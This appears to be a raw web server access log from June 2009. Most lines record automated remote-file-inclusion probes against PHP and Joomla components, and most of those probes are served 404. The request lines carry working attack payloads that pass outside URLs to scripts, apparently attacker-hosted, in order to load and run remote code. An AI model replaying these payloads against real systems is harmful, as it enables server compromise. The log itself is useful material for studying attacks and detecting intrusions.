217.160.79.161 - - [22/Jun/2009:03:26:28 -0400] "GET /logs/access_log.Q109053000//components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:26:40 -0400] "GET /logs/access_log.Q109051700//components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:03:26:43 -0400] "GET /logs/access_log.Q109060100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:26:55 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:26:55 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:26:55 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:27:13 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:27:13 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:27:14 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:27:25 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:27:25 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:27:25 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:27:25 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:03:27:32 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:03:27:39 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:27:44 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:03:27:45 -0400] "GET /logs/access_log.Q109060800%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:27:57 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:27:57 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:27:57 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:28:04 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:28:04 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:28:04 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:28:04 -0400] "GET /logs/access_log.Q109051900%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:28:04 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:28:04 -0400] "GET /logs/access_log.Q109053000%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:28:04 -0400] "GET /logs/access_log.Q109051900%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:03:28:04 -0400] "GET /logs/access_log.Q109053000%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:28:05 -0400] "GET /logs/error_log.Q109051400%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:28:21 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:28:22 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:28:23 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:28:23 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:03:28:34 -0400] "GET /logs/access_log.Q109051300%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:03:28:47 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.wfc.edu.tw/~ecsec/counter/images/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:29:00 -0400] "GET /logs/access_log.Q109053000%20%20//components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:29:03 -0400] "GET /logs/access_log.Q109053000%20%20//components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:29:07 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:29:18 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.6.17.151 - - [22/Jun/2009:03:30:01 -0400] "GET /images/_notes/nav_store_history_over_r1_c2.jpg.mno HTTP/1.0" 200 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.200.54 - - [22/Jun/2009:03:30:20 -0400] "GET /logs/access_log.Q109061300///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:03:30:20 -0400] "GET /logs/access_log.Q109052100///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.6.17.151 - - [22/Jun/2009:03:30:27 -0400] "GET /logs/error_log.Q109040500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.200.195.130 - - [22/Jun/2009:03:30:35 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:30:35 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:30:35 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:30:37 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:30:37 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:30:37 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:30:42 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.250.85.185 - - [22/Jun/2009:03:30:45 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
69.94.125.100 - - [22/Jun/2009:03:30:46 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:03:30:46 -0400] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.125.100 - - [22/Jun/2009:03:30:46 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.250.85.185 - - [22/Jun/2009:03:30:46 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
61.250.85.185 - - [22/Jun/2009:03:30:46 -0400] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
203.94.155.59 - - [22/Jun/2009:03:31:09 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:03:31:09 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.234.21.178 - - [22/Jun/2009:03:31:17 -0400] "GET /logs/access_log.Q109052000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
218.234.21.178 - - [22/Jun/2009:03:31:17 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
218.234.21.178 - - [22/Jun/2009:03:31:17 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
218.234.21.178 - - [22/Jun/2009:03:31:17 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.234.21.178 - - [22/Jun/2009:03:31:17 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.234.21.178 - - [22/Jun/2009:03:31:17 -0400] "GET /logs/access_log.Q109052000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
209.59.12.99 - - [22/Jun/2009:03:31:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.200.195.130 - - [22/Jun/2009:03:31:45 -0400] "GET /logs/access_log.Q109053000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:03:31:49 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:31:56 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:03:31:58 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.11.230.36 - - [22/Jun/2009:03:32:11 -0400] "GET /logs/error_log.Q109051400//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:19 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:19 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:19 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:25 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:25 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:03:32:35 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kudacuki.ucoz.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:40 -0400] "GET /logs/access_log.Q109050800/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:45 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:45 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:45 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:46 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.23.158.226 - - [22/Jun/2009:03:32:50 -0400] "GET /logs/access_log.Q109052000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [22/Jun/2009:03:32:50 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [22/Jun/2009:03:32:50 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
217.147.29.190 - - [22/Jun/2009:03:32:53 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:03:32:53 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [22/Jun/2009:03:32:53 -0400] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:54 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:54 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:54 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:55 -0400] "GET /logs/access_log.Q109052200/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.23.158.226 - - [22/Jun/2009:03:32:55 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
65.23.158.226 - - [22/Jun/2009:03:32:55 -0400] "GET /logs/access_log.Q109052000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
65.23.158.226 - - [22/Jun/2009:03:32:55 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
74.200.195.130 - - [22/Jun/2009:03:32:55 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:55 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:55 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:56 -0400] "GET /logs/access_log.Q109052200/modules/My_eGallery/index.php?basepath=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:59 -0400] "GET /logs/errors.php?error=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:59 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:32:59 -0400] "GET /errors.php?error=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:33:25 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:33:25 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [22/Jun/2009:03:33:25 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yourgamenow.com/transfer/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
